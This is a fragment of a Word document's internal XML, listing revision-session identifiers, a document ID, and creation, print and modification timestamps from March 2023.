    <w:rsid w:val="00671986"/>
    <w:rsid w:val="006756F2"/>
    <w:rsid w:val="006B35E7"/>
    <w:rsid w:val="00840AFD"/>
    <w:rsid w:val="009738FF"/>
    <w:rsid w:val="009F379C"/>
    <w:rsid w:val="00A10858"/>
    <w:rsid w:val="00A53528"/>
    <w:rsid w:val="00A7245D"/>
    <w:rsid w:val="00B56445"/>
    <w:rsid w:val="00BB77A0"/>
    <w:rsid w:val="00BE1A02"/>
    <w:rsid w:val="00C2230D"/>
    <w:rsid w:val="00C26BBB"/>
    <w:rsid w:val="00CD4DAF"/>
    <w:rsid w:val="00D66EB4"/>
    <w:rsid w:val="00D66EC9"/>
    <w:rsid w:val="00E13BE6"/>
    <w:rsid w:val="00E41632"/>
    <w:rsid w:val="00E5608A"/>
    <w:rsid w:val="00E964C4"/>
    <w:rsid w:val="00EC6824"/>
    <w:rsid w:val="00EE7866"/>
    <w:rsid w:val="00F8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DA284F"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{A1ABA92B-5B36-4149-8C36-0C4656E6E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B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35</cp:revision>
  <cp:lastPrinted>2023-03-16T03:11:00Z</cp:lastPrinted>
  <dcterms:created xsi:type="dcterms:W3CDTF">2023-03-16T00:46:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2023-03-16T03:13:00Z</dcterms:modified>
</cp:coreProperties>
</file>